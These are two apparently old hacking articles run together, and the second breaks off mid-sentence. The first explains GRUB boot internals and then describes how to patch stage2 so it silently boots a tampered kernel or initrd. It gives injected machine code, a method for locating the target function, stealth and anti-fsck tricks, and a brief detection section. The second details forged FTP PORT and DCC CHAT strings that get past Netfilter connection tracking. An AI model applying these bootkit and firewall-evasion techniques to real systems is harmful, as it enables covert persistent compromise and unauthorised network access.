             |      +--------+---------+      +-------+--------+

             |            No |                        |

     +-------+-------+       |       |          +-----+-----+   

     | load embedded |       |         stage1-> | load boot | 

     |   sectors     |       |       |          |   sector  |

     +-------+-------+       V                  +-----+-----+

        ^    |               |       + - - - < - - -  + Cf 1.3

        |    |               |                 +------+------+

   stage1.5  +-------->------+--------->-------+ load stage2 +






                 |   load the grub.conf  |

                 | display the boot menu |


                             | User interaction


                   | load kernel image |

                   |     and boot      |



----[ 1.2 - stage1


    stage1 is 512 Bytes, you can see its source code in stage1/stage1.S .

It's installed in MBR or in boot sector of primary partition. The task is

simple - load a specified sector (defined in stage2_sector) to a specified

address(defined in stage2_address/stage2_segment). If stage1.5 is

configured, the first sector of stage1.5 is loaded at address 0200:000; if

not, the first sector of stage2 is loaded at address 0800:0000.


----[ 1.3 - stage1.5 & stage2


    We know Grub is file-system-sensitive loader, i.e. Grub can understand

and read files from different file-systems, without the help of OS. Then

how? The secret is stage1.5 & stage2. Take a glance at /boot/grub, you'll

find the following files:

stage1, stage2, e2fs_stage1_5, fat_stage1_5, ffs_stage1_5, minix_stage1_5,

reiserfs_stage1_5, ... 

    We've mentioned stage1 in 1.2, the file stage1 will be installed in MBR

or in boot sector. So even if you delete file stage1, system boot are not


    What about zeroing file stage2 and *_stage1_5? Can system still boot?

The answer is 'no' for the former and 'yes' for the latter. You're

wondering about the reason? Then continue your reading...


    Let's see how *_stage1_5 and stage2 are generated:


-------------------------------- BEGIN -----------------------------------


gcc -o e2fs_stage1_5.exec -nostdlib -Wl,-N -Wl,-Ttext -Wl,2000

   e2fs_stage1_5_exec-start.o e2fs_stage1_5_exec-asm.o

   e2fs_stage1_5_exec-common.o e2fs_stage1_5_exec-char_io.o

   e2fs_stage1_5_exec-disk_io.o e2fs_stage1_5_exec-stage1_5.o

   e2fs_stage1_5_exec-fsys_ext2fs.o e2fs_stage1_5_exec-bios.o  

objcopy -O binary e2fs_stage1_5.exec e2fs_stage1_5



gcc -o pre_stage2.exec -nostdlib -Wl,-N -Wl,-Ttext -Wl,8200

   pre_stage2_exec-asm.o pre_stage2_exec-bios.o pre_stage2_exec-boot.o

   pre_stage2_exec-builtins.o pre_stage2_exec-common.o

   pre_stage2_exec-char_io.o pre_stage2_exec-cmdline.o

   pre_stage2_exec-disk_io.o pre_stage2_exec-gunzip.o

   pre_stage2_exec-fsys_ext2fs.o pre_stage2_exec-fsys_fat.o

   pre_stage2_exec-fsys_ffs.o pre_stage2_exec-fsys_minix.o

   pre_stage2_exec-fsys_reiserfs.o pre_stage2_exec-fsys_vstafs.o

   pre_stage2_exec-hercules.o pre_stage2_exec-serial.o

   pre_stage2_exec-smp-imps.o pre_stage2_exec-stage2.o


objcopy -O binary pre_stage2.exec pre_stage2

cat start pre_stage2 > stage2

--------------------------------- END ------------------------------------


   According to the output above, the layout should be:


  [start.S] [asm.S] [common.c] [char_io.c] [disk_io.c] [stage1_5.c]

  [fsys_ext2fs.c] [bios.c]


  [start.S] [asm.S] [bios.c] [boot.c] [builtins.c] [common.c] [char_io.c]

  [cmdline.c] [disk_io.c] [gunzip.c] [fsys_ext2fs.c] [fsys_fat.c]

  [fsys_ffs.c] [fsys_minix.c] [fsys_reiserfs.c] [fsys_vstafs.c]

  [hercules.c] [serial.c] [smp-imps.c] [stage2.c] [md5.c]


    We can see e2fs_stage1_5 and stage2 are similar. But e2fs_stage1_5 is

smaller, which contains basic modules(disk io, string handling, system

initialization, ext2/3 file system handling), while stage2 is all-in-one,

which contains all file system modules, display, encryption, etc.


    start.S is very important for Grub. stage1 will load start.S to

0200:0000(if stage1_5 is configured) or 0800:0000(if not), then jump to

it. The task of start.S is simple(only 512Byte),it will load the rest parts

of stage1_5 or stage2 to memory. The question is, since the file-system

related code hasn't been loaded, how can grub know the location of the rest

sectors? start.S makes a trick:


-------------------------------- BEGIN -----------------------------------


         .long 2          /* this is the sector start parameter, in logical

                    sectors from the start of the disk, sector 0 */

blocklist_default_len:    /* this is the number of sectors to read */

#ifdef STAGE1_5

         .word 0          /* the command "install" will fill this up */


         .word (STAGE2_SIZE + 511) >> 9



#ifdef STAGE1_5

         .word 0x220


         .word 0x820      /* this is the segment of the starting address

                             to load the data into */


firstlist:       /* this label has to be after the list data!!! */

--------------------------------- END ------------------------------------


    an example: 

# hexdump -x -n 512 /boot/grub/stage2


00001d0  [ 0000    0000    0000    0000 ][ 0000    0000    0000    0000 ]

00001e0  [ 62c7    0026    0064    1600 ][ 62af    0026    0010    1400 ]

00001f0  [ 6287    0026    0020    1000 ][ 61d0    0026    003f    0820 ]


    We should interpret(backwards) it as: load 0x3f sectors(start with No.

0x2661d0) to 0x0820:0000, load 0x20 sectors(start with No.0x266287) to

0x1000:0000, load 0x10 sectors(start with No.0x2662af) to 0x1400:00, load

0x64 sectors(start with No.0x2662c7) to 0x1600:0000. 

    In my distro, stage2 has 0xd4(1+0x3f+0x20+0x10+0x64) sectors, file size

is 108328 bytes, the two matches well(sector size is 512).


    When start.S finishes running, stage1_5/stage2 is fully loaded. start.S

jumps to asm.S and continues to execute.


    There still remains a problem, when is stage1.5 configured? In fact,

stage1.5 is not necessary. Its task is to load /boot/grub/stage2 to

memory. But pay attention, stage1.5 uses file system to load file stage2:

It analyzes the dentry, gets stage2's inode, then stage2's blocklists. So

if stage1.5 is configured, the stage2 is loaded via file system; if not,

stage2 is loaded via both stage2_sector in stage1 and sector lists in

start.S of stage2.

    To make things clear, suppose the following scenario: (ext2/ext3)

       # mv /boot/grub/stage2 /boot/grub/stage2.bak

    If stage1.5 is configured, the boot fails, stage1.5 can't find

/boot/grub/stage2 in the file-system. But if stage1.5 is not configured,

the boot succeeds! That's because mv doesn't change stage2's physical

layout, so stage2_sector remains the same, also the sector lists in stage2.


    Now, stage1 (-> stage1.5) -> stage2. Everything is in position. asm.S

will switch to protected mode, open /boot/grub/grub.conf(or menu.lst), get

configuration, display menus, and wait for user's interaction. After user

chooses the kernel, grub loads the specified kernel image(sometimes

ramdisk image also), then boots the kernel.


----[ 1.4 - Grub util


    If your grub is overwritten by Windows, you can use grub util to

reinstall grub.


    # grub


    grub > find /grub/stage2      <- if you have boot partition


    grub > find /boot/grub/stage2 <- if you don't have boot partition


    (hd0,0)                       <= the result of 'find'

    grub > root (hd0,0)           <- set root of boot partition


    grub > setup (hd0)            <- if you want to install grub in mbr


    grub > setup (hd0,0)          <- if you want to install grub in the

    ---                              boot sector

    Checking if "/boot/grub/stage1" exists... yes

    Checking if "/boot/grub/stage2" exists... yes

    Checking if "/boot/grub/e2fs_stage1_t" exists... yes

    Running "embed /boot/grub/e2fs_stage1_5 (hd0)"... 22 sectors are

embedded succeeded.                <= if you install grub in boot sector,

                                     this fails

    Running "install /boot/grub/stage1 d (hd0) (hd0)1+22 p

(hd0,0)/boot/grub/stage2 /boot/grub/grub.conf"... succeeded



    We can see grub util tries to embed stage1.5 if possible. If grub is

installed in MBR, stage1.5 is located after MBR, 22 sectors in size. If

grub is installed in boot sector, there's not enough space to embed

stage1.5(superblock is at offset 0x400 for ext2/ext3 partition, only 0x200

for stage1.5), so the 'embed' command fails.

    Refer to grub manual and source codes for more info.


--[ 2.0 - Possibility to load specified file


    Grub has its own mini-file-system for ext2/3. It use grub_open(),

grub_read() and grub_close() to open/read/close a file. Now, take a look at



/* preconditions: ext2fs_mount already executed, therefore supblk in buffer

 *                known as SUPERBLOCK 

 * returns: 0 if error, nonzero iff we were able to find the file

 *          successfully

 * postconditions: on a nonzero return, buffer known as INODE contains the

 *                 inode of the file we were trying to look up

 * side effects: messes up GROUP_DESC buffer area


int ext2fs_dir (char *dirname) {

  int current_ino = EXT2_ROOT_INO; /*start at the root */

  int updir_ino = current_ino;     /* the parent of the current directory */




    Suppose the line in grub.conf is:

    kernel=/boot/vmlinuz-2.6.11 ro root=/dev/hda1

    grub_open calls ext2fs_dir("/boot/vmlinuz-2.6.11 ro root=/dev/hda1"),

ext2fs_dir puts the inode info in INODE, then grub_read can use INODE to

get data of any offset(the map resides in INODE->i_blocks[] for direct



    The internal of ext2fs_dir is:

    1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1

       ^ inode = EXT2_ROOT_INO, put inode info in INODE;

    2. /boot/vmlinuz-2.6.11 ro root=/dev/hda1

        ^ find dentry in '/', then put the inode info of '/boot' in INODE;

    3. /boot/vmlinuz-2.6.11 ro root=/dev/hda1

             ^ find dentry in '/boot', then put the inode info of

             '/boot/vmlinuz-2.6.11' in INODE;

    4. /boot/vmlinuz-2.6.11 ro root=/dev/hda1

                           ^ the pointer is space, INODE is regular file,

                           returns 1(success), INODE contains info about


    If we parasitize this code, and return inode info of file_fake, grub

will happily load file_fake, considering it as /boot/vmlinuz-2.6.11.

    We can do this:

    1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1

       ^ inode = EXT2_ROOT_INO;

    2.  boot/vmlinuz-2.6.11 ro root=/dev/hda1

       ^ change it to 0x0, change EXT2_ROOT_INO to inode of file_fake;

    3.  boot/vmlinuz-2.6.11 ro root=/dev/hda1

       ^ EXT2_ROOT_INO(file_fake) info is in INODE, the pointer is 0x0,

       INODE is regular file, returns 1.


    Since we change the argument of ext2fs_dir, does it have side-effects?

Don't forget the latter part "ro root=/dev/hda1", it's the parameter passed

to kernel. Without it, the kernel won't boot correctly. 

(P.S.: Just "cat/proc/cmdline" to see the parameter your kernel has.)

    So, let's check the internal of "kernel=..."

    kernel_func processes the "kernel=..." line


static int

kernel_func (char *arg, int flags)



  /* Copy the command-line to MB_CMDLINE.  */

  grub_memmove (mb_cmdline, arg, len + 1);

  kernel_type = load_image (arg, mb_cmdline, suggested_type, load_flags);




    See? The arg and mb_cmdline have 2 copies of string

"/boot/vmlinuz-2.6.11 ro root=/dev/hda1" (there is no overlap, so in fact,

grub_memmove is the same as grub_memcpy). In load_image, you can find arg

and mb_cmdline don't mix with each other. So, the conclusion is - NO

side-effects. If you're not confident, you can add some codes to get things



--[ 3.0 - Hacking techniques


    The hacking techniques should be general for all grub versions(exclude

grub-ng) shipped with all Linux distros.


----[ 3.1 - How to load file_fake


    We can add a jump at the beginning of ext2fs_dir, then make the first

character of ext2fs_dir's argument to 0, make "current_ino = EXT2_ROOT_INO"

to "current_ino = INODE_OF_FAKE_FILE", then jump back. 

    Attention: Only when certain condition is met can you load file_fake. 

e.g.: When system wants to open /boot/vmlinuz-2.6.11, then /boot/file_fake

is returned; while when system wants /boot/grub/grub.conf, the correct file

should be returned. If the codes still return /boot/file_fake, oops, no

menu display.

    Jump is easy, but how to make "current_ino = INODE_OF_FAKE_FILE"?

int ext2fs_dir (char *dirname) {

  int current_ino = EXT2_ROOT_INO; /*start at the root */

  int updir_ino = current_ino;     /* the parent of the current directory */


    EXT2_ROOT_INO is 2, so current_ino and updir_ino are initialized to 2.

The correspondent assembly code should be like "movl $2, 0xffffXXXX($esp)"

But keep in mind of optimization: both current_ino and updir_ino are

assigned to 2, the optimized result can be "movl $2, 0xffffXXXX($esp)"

and "movl $2, 0xffffYYYY($esp)", or "movl $2, %reg" then "movl %reg,

0xffffXXXX($esp)" "movl %reg, 0xffffYYYY($esp)", or more variants. The type

is int, value is 2, so the possibility of "xor %eax, %eax; inc %eax; 

inc %eax" is low, it's also the same to "xor %eax, %eax; movb $0x2, %al". 

What we need is to search 0x00000002 from ext2fs_dir to ext2fs_dir + 

depth(e.g.: 100 bytes), then change 0x00000002 to INODE_OF_FAKE_FILE.


static char ext2_embed_code[] = {


         0x60,                              /* pusha                  */

         0x9c,                              /* pushf                  */

         0xeb, 0x28,                        /* jmp 4f                          */

         0x5f,                              /* 1: pop %edi                     */

         0x8b, 0xf,                         /* movl (%edi), %ecx               */

         0x8b, 0x74, 0x24, 0x28,            /* movl 40(%esp), %esi             */

         0x83, 0xc7, 0x4,          /* addl $4, %edi          */

         0xf3, 0xa6,               /* repz cmpsb %es:(%edi), %ds:(%esi)        */

         0x83, 0xf9, 0x0,          /* cmp $0, %ecx                    */

         0x74, 0x2,                         /* je 2f                  */

         0xeb, 0xe,                         /* jmp 3f                          */

         0x8b, 0x74, 0x24, 0x28,            /* 2: movl 40(%esp), %esi */

         0xc6, 0x6, 0x00,          /* movb $0x0, (%esi)      ''     */

         0x9d,                              /* popf                            */

         0x61,                              /* popa                            */

         0xe9, 0x0, 0x0, 0x0, 0x0, /* jmp change_inode                */

         0x9d,                              /* 3: popf                         */

         0x61,                              /* popa                            */

         0xe9, 0x0, 0x0, 0x0, 0x0, /* jmp not_change_inode            */

         0xe8, 0xd3, 0xff, 0xff, 0xff,      /* 4: call 1b                      */


         0x0, 0x0, 0x0, 0x0,                /* kernel filename length */

         0x0, 0x0, 0x0, 0x0, 0x0, 0x0,      /* filename string, 48B in all     */

         0x0, 0x0, 0x0, 0x0, 0x0, 0x0,

         0x0, 0x0, 0x0, 0x0, 0x0, 0x0,

         0x0, 0x0, 0x0, 0x0, 0x0, 0x0,

         0x0, 0x0, 0x0, 0x0, 0x0, 0x0,

         0x0, 0x0, 0x0, 0x0, 0x0, 0x0,

         0x0, 0x0, 0x0, 0x0, 0x0, 0x0,

         0x0, 0x0, 0x0, 0x0, 0x0, 0x0



memcpy(  buf_embed, ext2_embed_code, sizeof(ext2_embed_code));

Of course you can write your own string-comparison algorithm.


/* embeded code, 2nd part, change_inode */

memcpy(  buf_embed + sizeof(ext2_embed_code), s_start, s_mov_end - s_start);



/* embeded code, 3rd part, not_change_inode*/

memcpy(  buf_embed + sizeof(ext2_embed_code) + (s_mov_end - s_start) + 5,

         s_start, s_mov_end - s_start);


  The result is like this:


 ext2fs_dir:                                   not_change_inode:

  +------------------------+        +--------> +------------------------+

  | push %esp <= jmp embed |        |          | push %esp              |

  | mov %esp, %ebp         |        |          | mov %esp, %ebp         |

  | push %edi              |        |          | push %edi              |

  | push %esi              +--------<          | push %esi              |

  | sub $0x42c, %esp       |        |          | sub $0x42c, %esp       |

  | mov $2, fffffbe4(%esp) |        |          | mov $2, fffffbe4(%esp) |

  | mov $2, fffffbe0(%esp) |        |          | mov $2, fffffbe0(%esp) |

  |back:                   |        |          | jmp back               |

  +------------------------+        |          +------------------------+

 embed:                             +--------> change_inode:

  +------------------------+                   +------------------------+

  | save registers         |                   | push %esp              |

  | compare strings        |                   | mov %esp, %ebp         | 

  | if match, goto 1       |                   | push %edi              |

  | if not, goto 2         |                   | push %esi              |

  | 1: restore registers   |                   | sub $0x42c, %esp       |

  | jmp change_inode       |   INODE_OF_   ->  | mov $?, fffffbe4(%esp) |

  | 2: restore registers   |   FAKE_FILE   ->  | mov $?, fffffbe0(%esp) |

  | jmp not_change_inode   |                   | jmp back               |

  +------------------------+                   +------------------------+


----[ 3.2 - How to locate ext2fs_dir


    That's the difficult part. stage2 is generated by objcopy, so all ELF

information are stripped - NO SYMBOL TABLE! We must find some PATTERNs to

locate ext2fs_dir.


    The first choice is log2:

    #define long2(n) ffz(~(n))

    static __inline__ unsigned long

    ffz (unsigned long word)


        __asm__ ("bsfl %1, %0"

                :"=r" (word)

                :"r" (~word));

        return word;


    group_desc = group_id >> log2 (EXT2_DESC_PER_BLOCK (SUPERBLOCK));


    The question is, ffz is declared as __inline__, which indicates MAYBE

this function is inlined, MAYBE not. So we give it up.


    Next choice is SUPERBLOCK->s_inodes_per_group in

    group_id = (current_ino - 1) / (SUPERBLOCK->s_inodes_per_group);

    #define RAW_ADDR(x) (x)

    #define FSYS_BUF RAW_ADDR(0x68000)

    #define SUPERBLOCK ((struct ext2_super_block *)(FSYS_BUF))

    struct ext2_super_block{


        __u32 s_inodes_per_group   /* # Inodes per group */




    Then we calculate SUPERBLOCK->s_inodes_per_group is at 0x68028. This

address only appears in ext2fs_dir, so the possibility of collision is low.

After locating 0x68028, we move backwards to get the start of ext2fs_dir.

Here comes another question, how to identify the start of ext2fs_dir? Of

course you can search backwards for 0xc3, likely it's ret. But what if it's

only part of an instruction such as operands? Also, sometimes, gcc adds

some junk codes to make function address aligned(4byte/8byte/16byte), then

how to skip these junk codes? Just list all the possible combinations?

    This method is practical, but not ideal.


    Now, we noticed fsys_table:


    struct fsys_entry fsys_table[NUM_FSYS + 1] =



    # ifdef FSYS_FAT

      {"fat", fat_mount, fat_read, fat_dir, 0, 0},

    # endif

    # ifdef FSYS_EXT2FS

      {"ext2fs", ext2fs_mount, ext2fs_read, ext2fs_dir, 0, 0},

    # endif

    # ifdef FSYS_MINIX

      {"minix", minix_mount, minix_read, minix_dir, 0, 0},

    # endif




    fsys_table is called like this:


      if ((*(fsys_table[fsys_type].mount_func)) () != 1)


    So, our trick is: 

1. Search stage2 for string "ext2fs", get its offset, then convert it to

   memory address(stage2 starts from 0800:0000) addr_1.

2. Search stage2 for addr_1, get its offset, then get next 5 integers

   (A, B, C, D, E), A<B ? B<C ? C<addr_1 ? D==0 ? E==0? If any one is "No",

   goto 1 and continue search

3. Then C is memory address of ext2fs_dir, convert it to file offset. OK,

   that's it.


----[ 3.3 - How to hack grub


    OK, with the help of 3.1 and 3.2, we can hack grub very easily.

    The first target is stage2. We get the start address of ext2fs_dir, add

a JMP to somewhere, then copy the embeded code. Then where is 'somewhere'?

Obviously, the tail of stage2 is not perfect, this will change the file

size. We can choose minix_dir as our target. What about fat_mount? It's

right behind ext2fs_dir. But the answer is NO! Take a look at "root ..."



    for (fsys_type = 0; fsys_type < NUM_FSYS

         && (*(fsys_table[fsys_type].mount_func)) () != 1; fsys_type++);


    Take a look at fsys_table, fat is ahead of ext2, so fat_mount is called

first. If fat_mount is modified, god knows the result. To make things safe,

we choose minix_dir.


    Now, your stage2 can load file_fake. Size remains the same, but hash

value changed.


----[ 3.4 - How to make things sneaky


    Why must we use /boot/grub/stage2? We can get stage1 jump to

stage2_fake(cp stage2 stage2_fake, modify stage2_fake), so stage2 remains


    If you cp stage2 to stage2_fake, stage2_fake won't work. Remember the

sector lists in start.S? You have to change the lists to stage2_fake, not

the original stage2. You can retrieve the inode, get i_block[], then the

block lists are there(Don't forget to add the partition offset). You have

to bypass the VFS to get inode info, see [1].

    Since you use stage2_fake, the correspondent address in stage1 should

be modified. If the stage1.5 is not installed, that's easy, you just change

stage2_sector from stage2_orig to stage2_fake(MBR is changed). If stage1.5

is installed and you're lazy and bold, you can skip stage1.5 - modify

stage2_address, stage2_sector, stage2_segment of stage1. This is risky, 

because 1) If "virus detection" in BIOS is enabled, the MBR modification 

will be detected 2) The "Grub stage1.5" & "Grub loading, please wait" will

change to "Grub stage2". It's flashy, can you notice it on your FAST PC? 

    If you really want to be sneaky, then you can hack stage1.5, using

similiar techniques like 3.1 and 3.2. Don't forget to change the sector

lists of stage1.5(start.S) - you have to append your embeded code at the


    You can make things more sneaky: make stage2_fake/kernel_fake hidden

from FS, e.g. erase its dentry from /boot/grub. Wanna anti-fsck? Move

inode_of_stage2 to inode_from_1_to_10. See  [2]


--[ 4.0 - Usage


    Combined with other techniques, see how powerful our hack_grub is.

    Notes: All files should reside in the same partition!

    1) Combined with static kernel patch

       a) cp kernel.orig kernel.fake

       b) static kernel patch with kernel.fake[3]

       c) cp stage2 stage2.fake

       d) hack_grub stage2.fake kernel.orig inode_of_kernel.fake

       e) hide kernel.fake and stage2.fake (optional)

    2) Combined with module injection

       a) cp initrd.img.orig initrd.img.fake

       b) do module injection with initrd.img.fake, e.g. ext3.[k]o [4]

       c) cp stage2 stage2.fake

       d) hack_grub stage2.fake initrd.img inode_of_initrd.img.fake

       e) hide initrd.img.fake and stage2.fake (optional)

    3) Make a fake grub.conf

    4) More...


--[ 5.0 - Detection


    1) Keep an eye on MBR and the following 63 sectors, also primary boot


    2) If not 1, 

        a) if stage1.5 is configured, compare sectors from 3(absolute

           address, MBR is sector No. 1) with /boot/grub/e2fs_stage1_5

        b) if stage1.5 is not configured, see if stage2_sector points to

           real /boot/grub/stage2 file

    3) check the file consistency of e2fs_stage1_5 and stage2

    4) if not 3 (Hey, are you a qualified sysadmin?)

       if a) If you're suspicious about kernel, dump the kernel and make a

             byte-to-byte with kernel on disk. See [5] for more

          b) If you're suspicious about module, that's a hard challenge,

             maybe you can dump it and disassemble it?


--[ 6.0 - At the end


    Lilo is another boot loader, but it's file-system-insensitive. So Lilo

doesn't have built-in file-systems. It relies on /boot/bootsect.b and

/boot/map.b. So, if you're lazy, write a fake lilo.conf, which displays

a.img but loads b.img. Or, you can make lilo load /boot/map.b.fake. The

details depend on yourself. Do it!




Breaking through a Firewall using a forged FTP command

able of Contents

  1 - Introduction
  2 - FTP, IRC and the stateful inspection of Netfilter
  3 - Attack Scenario I
    3.1 - First Trick
    3.2 - First Trick Details
  4 - Attack Scenario II - Non-standard command line
    4.1 - Second Trick Details
  5 - Attack Scenario III - 'echo' feature of FTP reply
    5.1 - Passive FTP: background information
    5.2 - Third Trick Details
  6 - APPENDIX I. A demonstration tool of the second trick
  7 - APPENDIX II. A demonstration example of the second attack trick.

--[ 1 - Introduction

    FTP is a protocol that uses two connections. One of them is called a
control connection and the other, a data connection. FTP commands and
replies are exchanged across the control connection that lasts during an
FTP session. On the other hand, a file(or a list of files) is sent across
the data connection, which is newly established each time a file is

    Most firewalls do not usually allow any connections except FTP control
connections to an FTP server port(TCP port 21 by default) for network
security. However, as long as a file is transferred, they accept the data
connection temporarily. To do this, a firewall tracks the control
connection state and detects the command related to file transfer. This is
called stateful inspection.

    I've created three attack tricks that make a firewall allow an illegal
connection by deceiving its connection tracking using a forged FTP command.

    I actually tested them in Netfilter/IPTables, which is a firewall
installed by default in the Linux kernel 2.4 and 2.6. I confirmed the first
trick worked in the Linux kernel 2.4.18 and the second one(a variant of the
first one) worked well in the Linux 2.4.28(a recent version of the Linux

    This vulnerability was already reported to the Netfilter project team
and they fixed it in the Linux kernel 2.6.11.

--[ 2 - FTP, IRC and the stateful inspection of Netfilter

    First, let's examine FTP, IRC(You will later know why IRC is mentioned)
and the stateful inspection of Netfilter. If you are a master of them, you
can skip this chapter.

    As stated before, FTP uses a control connection in order to exchange
the commands and replies(, which are represented in ASCII) and, on the
contrary, uses a data connection for file transfer.

    For instance, when you command "ls" or "get <a file name>" at FTP
prompt, the FTP server(in active mode) actively initiates a data connection
to a TCP port number(called a data port) on the FTP client, your host. The
client, in advance, sends the data port number using a PORT command, one of
FTP commands.

The format of a PORT command is as follows.


    Here the character string "h1,h2,h3,h4" means the dotted-decimal IP
"h1.h2.h3.h4" which belongs to the client. And the string "p1,p2" indicates
a data port number(= p1 * 256 + p2). Each field of the address and port
number is in decimal number. A data port is dynamically assigned by a
client. In addition, the commands and replies end with <CRLF> character

    Netfilter tracks an FTP control connection and gets the TCP sequence
number and the data length of a packet containing an FTP command line
(which ends with <LF>). And then it computes the sequence number of the
next command packet based on the information. When a packet with the
sequence number is arrived, Netfilter analyzes whether the data of the
packet contains an FTP command. If the head of the data is the same as
"PORT" and the data ends with <CRLF>, then Netfilter considers it as a
valid PORT command (the actual codes are a bit more complicated) and
extracts an IP address and a port number from it. Afterwards, Netfilter
"expects" the server to actively initiate a data connection to the
specified port number on the client. When the data connection request is
actually arrived, it accepts the connection only while it is established.
In the case of an incomplete command which is called a "partial" command,
it is dropped for an accurate tracking.

    IRC (Internet Relay Chat) is an Internet chatting protocol. An IRC
client can use a direct connection in order to speak with another client.
When a client logs on the server, he/she connects to an IRC server
(TCP port 6667 by default). On the other hand, when the client wants to
communicate with another, he/she establishes a direct connection to the
peer. To do this, the client sends a message called a DCC CHAT command in
advance. The command is analogous to an FTP PORT command. And Netfilter
tracks IRC connections as well. It expects and accepts a direct chatting

--[ 3 - Attack Scenario I

----[ 3.1 - First Trick

    I have created a way to connect illegally to any TCP port on an FTP
server that Netfilter protects by deceiving the connection-tracking module
in the Linux kernel 2.4.18.

    In most cases, IPTables administrators make stateful packet filtering
rule(s) in order to accept some Internet services such as IRC direct
chatting and FTP file transfer. To do this, the administrators usually
insert the following rule into the IPTables rule list.

    iptables -A FORWARD -m state --state ESTABLISHED, RELATED -j ACCEPT

    Suppose that a malicious user who logged on the FTP server transmits a
PORT command with TCP port number 6667(this is a default IRC server port
number) on the external network and then attempts to download a file from
the server.

    The FTP server actively initiates a data connection to the data port
6667 on the attacker's host. The firewall accepts this connection under the
stateful packet filtering rule stated before. Once the connection is
established, the connection-tracking module of the firewall(in the Linux
kernel 2.4.18) has the security flaw to mistake this for an IRC connection.
Thus the attacker's host can pretend to be an IRC server.

    If the attacker downloads a file comprised of a string that has the
same pattern as DCC CHAT command, the connection-tracking module will
misunderstand the contents of a packet for the file transfer as a DCC CHAT

    As a result, the firewall allows any host to connect to the TCP port
number, which is specified in the fake DCC CHAT command, on the fake IRC
client (i.e., the FTP server) according to the rule to accept the "related"
connection for IRC. For this, the attacker has to upload the file before
the intrusion.

    In conclusion, the attacker is able to illegally connect to any TCP
port on the FTP server.

----[ 3.2 - First Trick Details

    To describe this in detail, let's assume a network configuration is as

(a) A Netfilter/IPtables box protects an FTP server in a network. So users
    in the external network can connect only to FTP server port on the FTP
    server. Permitted users can log on the server and download/upload

(b) Users in the protected network, including FTP server host, can connect
    only to IRC servers in the external network.

(c) While one of the internet services stated in (a) and (b) is
    established, the secondary connections(e.g., FTP data connection)
    related to the service can be accepted temporarily.

(d) Any other connections are blocked.

    To implement stateful inspection for IRC and FTP, the administrator
loads the IP connection tracking modules called ip_conntrack into the
firewall including ip_conntrack_ftp and ip_conntrack_irc that track FTP and
IRC, respectively. Ipt_state must be also loaded.

    Under the circumstances, an attacker can easily create a program that
logs on the FTP server and then makes the server actively initiate an FTP
data connection to an arbitrary TCP port on his/her host.

    Suppose that he/she transmits a PORT command with data port 6667 (i.e.,
default IRC server port).

An example is "PORT 192,168,100,100,26,11\r\n".

    The module ip_conntrack_ftp tracking this connection analyzes the PORT
command and "expects" the FTP server to issue an active open to the
specified port on the attacker's host.

    Afterwards, the attacker sends an FTP command to download a file,
"RETR <a file name>". The server tries to connect to port 6667 on the
attacker's host. Netfilter accepts the FTP data connection under the
stateful packet filtering rule.

    Once the connection is established, the module ip_conntrack mistakes
this for IRC connection. Ip_conntrack regards the FTP server as an IRC
client and the attacker's host as an IRC server. If the fake IRC client
(i.e., the FTP server) transmits packets for the FTP data connection, the
module ip_conntrack_irc will try to find a DCC protocol message from the

    The attacker can make the FTP server send the fake DCC CHAT command
using the following trick. Before this intrusion, the attacker uploads a
file comprised of a string that has the same pattern as a DCC CHAT command
in advance.

    To my knowledge, the form of a DCC CHAT command is as follows.

"\1DCC<a blank>CHAT<a blank>t<a blank><The decimal IP address of the IRC
client><blanks><The TCP port number of the IRC client>\1\n"

An example is "\1DCC CHAT t 3232236548    8000\1\n"

    In this case, Netfilter allows any host to do an active open to the TCP
port number on the IRC client specified in the line. The attacker can, of
course, arbitrarily specify the TCP port number in the fake DCC CHAT
command message.

    If a packet of this type is passed through the firewall, the module
ip_conntrack_irc mistakes this message for a DCC CHAT command and "expects"
any host to issue an active open to the specified TCP port number on the
FTP server for a direct chatting.

    As a result, Netfilter allows the attacker to connect to the port
number on the FTP server according to the stateful inspection rule.

    After all, the attacker can illegally connect to any TCP port on the
FTP server using this trick.

--[ 4 - Attack Scenario II - Non-standard command line

----[ 4.1. Second Trick Details

    Netfilter in the Linux kernel 2.4.20(and the later versions) is so
fixed that a secondary connection(e.g., an FTP data connection) accepted by
a primary connection is not mistaken for that of any other protocol. Thus
the packet contents of an FTP data connection are not parsed any more by
the IRC connection-tracking module.

    However, I've created a way to connect illegally to any TCP port on an
FTP server that Netfilter protects by dodging connection tracking using a
nonstandard FTP command. As stated before, I confirmed that it worked in
the Linux kernel 2.4.28.

    Under the circumstances stated in the previous chapter, a malicious
user in the external network can easily create a program that logs on the
FTP server and transmits a nonstandard FTP command line.

    For instance, an attacker can transmit a PORT command without the
character <CR> in the end of the line. The command line has only <LF> in
the end.

    An example is "PORT 192,168,100,100,26,11\n".

    On the contrary, a standard FTP command has <CRLF> sequence to denote
the end of a line.

    If the module ip_conntrack_ftp receives a nonstandard PORT command of
this type, it first detects a command and finds the character <CR> for the
parsing. Because it cannot be found, ip_conntrack_ftp regards this as a
"partial" command and drops the packet.

    Just before this action, ip_conntrack_ftp anticipated the sequence
number of a packet that contains the next FTP command line and updated the
associated information. This number is calculated based on the TCP sequence
number and the data length of the "partial" PORT command packet.

    However, a TCP client, afterwards, usually retransmits the identical
PORT command packet since the corresponding reply is not arrived at the
client. In this case, ip_conntrack_ftp does NOT consider this retransmitted
packet as an FTP command because its sequence number is different from that
of the next FTP command anticipated. From the point of view of
ip_conntrack_ftp, the packet has a "wrong" sequence number position.

    The module ip_conntrack_ftp just accepts the packet without analyzing
this command. The FTP server can eventually receive the retransmitted
packet from the attacker.

    Although ip_conntrack_ftp regards this "partial" command as INVALID,
some FTP servers such as wu-FTP and IIS FTP conversely consider this PORT
command without <CR> as VALID. In conclusion, the firewall, in this case,
fails to "expect" the FTP data connection.

    And when the attacker sends a RETR command to download a file from the
server, the server initiates to connect to the TCP port number, specified
in the partial PORT command, on the attacker's host.

    Suppose that the TCP port number is 6667(IRC server port), the firewall
accepts this connection under the stateless packet filtering rule that
allows IRC connections instead of the stateful filtering rule. So the IP
connection-tracking module mistakes the connection for IRC.

    The next steps of the attack are the same as those of the trick stated
in the previous chapter.

    In conclusion, the attacker is able to illegally connect to any TCP
port on the FTP server that the Netfilter firewall box protects.

*[supplement] There is a more refined method to dodge the
connection-tracking of Netfilter. It uses default data port. On condition
that data port is not specified by a PORT command and a data connection is
required to be established, an FTP server does an active open from port 20
on the server to the same (a client's) port number that is being used for
the control connection.

    To do this, the client has to listen on the local port in advance. In
addition, he/she must bind the local port to 6667(IRCD) and set the socket
option "SO_REUSEADDR" in order to reuse this port.

    Because a PORT command never passes through a Netfilter box, the
